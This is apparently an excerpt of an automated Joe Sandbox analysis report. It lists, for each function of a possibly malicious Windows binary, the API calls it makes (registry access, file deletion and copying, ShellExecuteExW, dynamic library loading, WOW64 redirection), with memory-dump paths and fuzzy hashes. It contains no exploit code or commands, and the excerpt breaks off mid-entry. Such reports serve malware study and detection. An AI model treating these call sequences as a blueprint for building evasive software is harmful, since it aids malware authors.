                                                                  • GetClientRect.USER32(?), ref: 006634EF
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00663506
                                                                  • GetWindowDC.USER32(?), ref: 00663512
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00663521
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00663533
                                                                  • GetSysColor.USER32(00000005), ref: 0066354D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                  • String ID:
                                                                  • API String ID: 272304278-0
                                                                  • Opcode ID: ab1c2e6f15308cb070c659d63384f554ed11760d07ff090e55e4fa7e3aaae73e
                                                                  • Instruction ID: ae421396e93d5dbacce548151f970a1b28eb946a666a42be2f190548b8c1bb6e
                                                                  • Opcode Fuzzy Hash: ab1c2e6f15308cb070c659d63384f554ed11760d07ff090e55e4fa7e3aaae73e
                                                                  • Instruction Fuzzy Hash: D6012872500115EFDB605F64DC08BE97BB6FB04321F501260FA1AA62A1EB311EA2AF11
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006821CC
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 006821D8
                                                                  • CloseHandle.KERNEL32(?), ref: 006821E1
                                                                  • CloseHandle.KERNEL32(?), ref: 006821E9
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006821F2
                                                                  • HeapFree.KERNEL32(00000000), ref: 006821F9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: 540c0b233470d132fa1244953682904f072c87aa13f351a1e5dfd8881f5794ec
                                                                  • Instruction ID: 91956f1def3fbf720d0ee24cdacf35f0bc90de04ff172a479557d7fcd158ab49
                                                                  • Opcode Fuzzy Hash: 540c0b233470d132fa1244953682904f072c87aa13f351a1e5dfd8881f5794ec
                                                                  • Instruction Fuzzy Hash: 0BE0E5F6008105BBDB011FA5EC0C94ABF7AFF49322B105320F2258A070EB3294A0DB50
                                                                  APIs
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 006AB903
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • GetProcessId.KERNEL32(00000000), ref: 006AB998
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006AB9C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                  • String ID: <$@
                                                                  • API String ID: 146682121-1426351568
                                                                  • Opcode ID: e2d8eb23392b2a410836585407e0d5b11be8953d0d738f914f76fb6191429d2e
                                                                  • Instruction ID: 151ce82f0399fe9ff8560752b24a2d869338f29f7fe54bf9507b3c1124d2753e
                                                                  • Opcode Fuzzy Hash: e2d8eb23392b2a410836585407e0d5b11be8953d0d738f914f76fb6191429d2e
                                                                  • Instruction Fuzzy Hash: 89714575A00625DFCB10EF54C494A9EBBF6FF09310F048499E856AB392CB75AD41CF94
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B48D1
                                                                  • IsMenu.USER32(?), ref: 006B48E6
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B492E
                                                                  • DrawMenuBar.USER32 ref: 006B4941
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                  • String ID: 0
                                                                  • API String ID: 3076010158-4108050209
                                                                  • Opcode ID: e0fa7a83db8f5c56af5ea76f5abde36ada10ef7c18ceae4d2b7bddc8a60a2273
                                                                  • Instruction ID: ef1442cf12b9dc0667665622742b2e03d17f59d9fe696e27cda6bf60de30a007
                                                                  • Opcode Fuzzy Hash: e0fa7a83db8f5c56af5ea76f5abde36ada10ef7c18ceae4d2b7bddc8a60a2273
                                                                  • Instruction Fuzzy Hash: 724157B5A00209EFDB20DF51D884AEABBBAFF06364F044129E9559B351DB30ED85CF60
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006827B3
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006827C6
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 006827F6
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 2081771294-1403004172
                                                                  • Opcode ID: 35b666bfc0c12350c710af79d32396643dbb843db8804ceac99fccdb536396e4
                                                                  • Instruction ID: 3184062b612fe00cd828a6f7606f42756da65cea9223640ebded19007f300cc7
                                                                  • Opcode Fuzzy Hash: 35b666bfc0c12350c710af79d32396643dbb843db8804ceac99fccdb536396e4
                                                                  • Instruction Fuzzy Hash: E32105B1940105BEDB45BBA0DC56CFE7BBADF45360F10822DF421A72E1DF34494A8B60
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006B3A29
                                                                  • LoadLibraryW.KERNEL32(?), ref: 006B3A30
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006B3A45
                                                                  • DestroyWindow.USER32(?), ref: 006B3A4D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 3529120543-1011021900
                                                                  • Opcode ID: 6bec24066de66264e092f250a55580e11c338d84a3e4de89e31727587d29b471
                                                                  • Instruction ID: ddba58085a984b67cab873f238aa9b02aab64483f35920070cdc0c6892eb9505
                                                                  • Opcode Fuzzy Hash: 6bec24066de66264e092f250a55580e11c338d84a3e4de89e31727587d29b471
                                                                  • Instruction Fuzzy Hash: BF218EB1700225AFEB109F64DC80FFB77ABEB45364F215228FA9196390E771CD919760
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetCursorPos.USER32(?), ref: 006B9A5D
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006B9A72
                                                                  • GetCursorPos.USER32(?), ref: 006B9ABA
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 006B9AF0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID: (o
                                                                  • API String ID: 2864067406-1684096767
                                                                  • Opcode ID: d09d85291dfd722bddb60661ef1efcd9b57663825ed81296d4304fd17ee39938
                                                                  • Instruction ID: 4a138e10dc33a836b4bc0c2f9fbfe54b6ae115fc4d1ca8db31cb5f096692a102
                                                                  • Opcode Fuzzy Hash: d09d85291dfd722bddb60661ef1efcd9b57663825ed81296d4304fd17ee39938
                                                                  • Instruction Fuzzy Hash: E221ABB5600018AFCF258F98C858EFA7BBBEF09350F404169FA058B2A1E7759991DF60
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00621AF4
                                                                  • GetClientRect.USER32(?,?), ref: 006631F9
                                                                  • GetCursorPos.USER32(?), ref: 00663203
                                                                  • ScreenToClient.USER32(?,?), ref: 0066320E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID: (o
                                                                  • API String ID: 4127811313-1684096767
                                                                  • Opcode ID: e2414bb00a6fe88593c35c8bea49a5a2cc2554d63455d908724bfd97572f5af8
                                                                  • Instruction ID: 25173ab51a46c53f6845159d5ede3c206b52117062ecf5b2aadbb3ec4a3d2e59
                                                                  • Opcode Fuzzy Hash: e2414bb00a6fe88593c35c8bea49a5a2cc2554d63455d908724bfd97572f5af8
                                                                  • Instruction Fuzzy Hash: 80118F7190152AFBCB10DF94D9468FEB7BAFB06340F000456E912E7240D730BB91CBA5
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0064508E,?,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002), ref: 006450FD
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00645110
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0064508E,?,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002,00000000), ref: 00645133
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: bfa398a678e2f4e9d026bafd7ed3b3a1d4ac80747c0048b379e92e68806d2663
                                                                  • Instruction ID: 053b827eef08b619310ef7e87a2f3cce95fff21500b7da7b1f3b48bac37e90dd
                                                                  • Opcode Fuzzy Hash: bfa398a678e2f4e9d026bafd7ed3b3a1d4ac80747c0048b379e92e68806d2663
                                                                  • Instruction Fuzzy Hash: 21F0C830900208BFDB105F94DC49BEDBFBBEF05712F000168F806A6261DB349D80CA90
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062664A
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0062665C
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062666E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 145871493-3689287502
                                                                  • Opcode ID: 606189e6fc990615fee96df0a0604c5fe78a2fbe85a6dc814e02b281acecbfee
                                                                  • Instruction ID: 0035de613e84679d5dcb3dab5ab39ded53f28534cb581dc37889af534f2307b2
                                                                  • Opcode Fuzzy Hash: 606189e6fc990615fee96df0a0604c5fe78a2fbe85a6dc814e02b281acecbfee
                                                                  • Instruction Fuzzy Hash: 9DE0CD76A02A321793121729FC0CB9E652FDF82F12F060325FC00DA304EF54CC4286E5
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626610
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00626622
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626635
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 145871493-1355242751
                                                                  • Opcode ID: 12fd741bb3dc83c9a5434320a5719aa3dbea3a74c22baf002faff7c0193f0792
                                                                  • Instruction ID: a6d9cad0a80c68b105ea8d33da14f3d102a66b115877900786f612fea16b6c22
                                                                  • Opcode Fuzzy Hash: 12fd741bb3dc83c9a5434320a5719aa3dbea3a74c22baf002faff7c0193f0792
                                                                  • Instruction Fuzzy Hash: 30D01275612A325743222729BC189CE6A1B9E91F113060125F800AA214EF64CD528B99
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006935C4
                                                                  • DeleteFileW.KERNEL32(?), ref: 00693646
                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0069365C
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0069366D
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0069367F
                                                                  Similarity
                                                                  • API ID: File$Delete$Copy
                                                                  • String ID:
                                                                  • API String ID: 3226157194-0
                                                                  • Opcode ID: c7c2dc5e9ef1c486e0bd24b542914ed8b8c6ca7adc6f65848180ff8173649128
                                                                  • Instruction ID: 48c1b3ddb6dfce499e878494c5b45d61d586ae4810cf62b3d6476d27bb30153d
                                                                  • Opcode Fuzzy Hash: c7c2dc5e9ef1c486e0bd24b542914ed8b8c6ca7adc6f65848180ff8173649128
                                                                  • Instruction Fuzzy Hash: 95B14F72D00129ABDF51DFA4CC85EDEB7BEEF48314F0040AAF509E6251EA349B458F65
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32 ref: 006AAE87
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006AAE95
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006AAEC8
                                                                  • CloseHandle.KERNEL32(?), ref: 006AB09D
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 3488606520-0
                                                                  • Opcode ID: 750257d56dcd6d9bbec2f44ec763546f14719b3768a0f3517b85bb3ee499e103
                                                                  • Instruction ID: 9877b6b93ed83034f25723ce73a65cb5ee27510da13a7b3e84fb8bb535c9d4ad
                                                                  • Opcode Fuzzy Hash: 750257d56dcd6d9bbec2f44ec763546f14719b3768a0f3517b85bb3ee499e103
                                                                  • Instruction Fuzzy Hash: D1A1AEB1A047019FE760EF24C886B2AB7E2AF48710F14881DF5999B392D771EC418F86
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC505
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006AC560
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006AC5C3
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 006AC606
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AC613
                                                                  Similarity
                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 826366716-0
                                                                  • Opcode ID: 582b078ff9c1a9ae2f962dbd7992c3ecc3fbfd52b1bf1d85404a3ba4f5518b7b
                                                                  • Instruction ID: 8fea5e48126cb7feddabeca719c280f2adff020ba261936dd40c3371f433bdc8
                                                                  • Opcode Fuzzy Hash: 582b078ff9c1a9ae2f962dbd7992c3ecc3fbfd52b1bf1d85404a3ba4f5518b7b
                                                                  • Instruction Fuzzy Hash: 4161C371608641AFC714EF14C890E6ABBE6FF85318F14959CF09A8B292DB31ED46CF91
                                                                  APIs
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0068D7CD,?), ref: 0068E714
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0068D7CD,?), ref: 0068E72D
                                                                    • Part of subcall function 0068EAB0: GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0068ED8A
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0068EDC3
                                                                  • _wcslen.LIBCMT ref: 0068EF02
                                                                  • _wcslen.LIBCMT ref: 0068EF1A
                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0068EF67
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3183298772-0
                                                                  • Opcode ID: b5d754da214ca019a71bc155ef2bc1b178ecacf0317ef7ef20b379ac2438a522
                                                                  • Instruction ID: 39db557fdd46954c3651a55e7ab828ad041760f509a2a136e83900c375245c22
                                                                  • Opcode Fuzzy Hash: b5d754da214ca019a71bc155ef2bc1b178ecacf0317ef7ef20b379ac2438a522
                                                                  • Instruction Fuzzy Hash: AE5198B25087849BC764EB50DC919DB73EEEF85300F000A2EF285D3151EF31A68C8B6A
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00689534
                                                                  • VariantClear.OLEAUT32 ref: 006895A5
                                                                  • VariantClear.OLEAUT32 ref: 00689604
                                                                  • VariantClear.OLEAUT32(?), ref: 00689677
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006896A2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                  • String ID:
                                                                  • API String ID: 4136290138-0
                                                                  • Opcode ID: 45dba5f18f550fa82f76164472bcef6133032a64af0045f377c0446cc56e4e48
                                                                  • Instruction ID: 170f9f5f179d15ba5d70b3492300de4959dc2fbc79ce885a4fd80b19ef6d7e5e
                                                                  • Opcode Fuzzy Hash: 45dba5f18f550fa82f76164472bcef6133032a64af0045f377c0446cc56e4e48
                                                                  • Instruction Fuzzy Hash: BF514AB5A00219EFDB14DF58C884AAAB7F9FF89314B158659E905DB310E730E951CFA0
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006995F3
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0069961F
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00699677
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0069969C
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006996A4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                  • String ID:
                                                                  • API String ID: 2832842796-0
                                                                  • Opcode ID: dd4d8d1d0a2f085913d8d4eaa1e841bc34052100c1e5f856e4c6c7d2da5e3e34
                                                                  • Instruction ID: 6f3552b6844dccb3a62eff38f8ee93a91c4a70a9d62012afbac623faae3a9e63
                                                                  • Opcode Fuzzy Hash: dd4d8d1d0a2f085913d8d4eaa1e841bc34052100c1e5f856e4c6c7d2da5e3e34
                                                                  • Instruction Fuzzy Hash: 4F512935A006259FDF05DF64C881AAABBF6FF48314F058058E949AB3A2CB35ED41CF94
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 006A999D
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 006A9A2D
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 006A9A49
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 006A9A8F
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 006A9AAF
                                                                    • Part of subcall function 0063F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00691A02,?,7529E610), ref: 0063F9F1
                                                                    • Part of subcall function 0063F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00680354,00000000,00000000,?,?,00691A02,?,7529E610,?,00680354), ref: 0063FA18
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                  • String ID:
                                                                  • API String ID: 666041331-0
                                                                  • Opcode ID: 2ecd40e50ed98b2655e19b76ae83f83cbdf465dce6fd0175c63609ca96b60201
                                                                  • Instruction ID: 421d2793ccca64b0a7070c54ed79e0097f4ac8932b4910be390dc8f6b00f7bda
                                                                  • Opcode Fuzzy Hash: 2ecd40e50ed98b2655e19b76ae83f83cbdf465dce6fd0175c63609ca96b60201
                                                                  • Instruction Fuzzy Hash: 09514A35A00615DFCB00EF68C48499DBBF2FF0A314B1981A9E9069B762D731ED86CF91
                                                                  APIs
                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 006B766B
                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 006B7682
                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 006B76AB
                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0069B5BE,00000000,00000000), ref: 006B76D0
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 006B76FF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MessageSendShow
                                                                  • String ID:
                                                                  • API String ID: 3688381893-0
                                                                  • Opcode ID: e56e242837ecd93e2ff0d555639508e0624996ade0f25f542fc5eb8454611376
                                                                  • Instruction ID: 8f88cbdfdc3b747f00d14778c79c07dc3f1eba48527ac2ea0973bc2f8f03233b
                                                                  • Opcode Fuzzy Hash: e56e242837ecd93e2ff0d555639508e0624996ade0f25f542fc5eb8454611376
                                                                  • Instruction Fuzzy Hash: 3441C1B5A08504AFD7258F2CCC49FE57BA7EB89350F150264F819AB3E0E670EE91DB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: 03b4a17853c60726384c8618765627949dc3c401d541252ba185e7ef3a6218e9
                                                                  • Instruction ID: c35e71cdab623981d8d1103622479e2aa5575795e315ba4f151f39dd0c43a30d
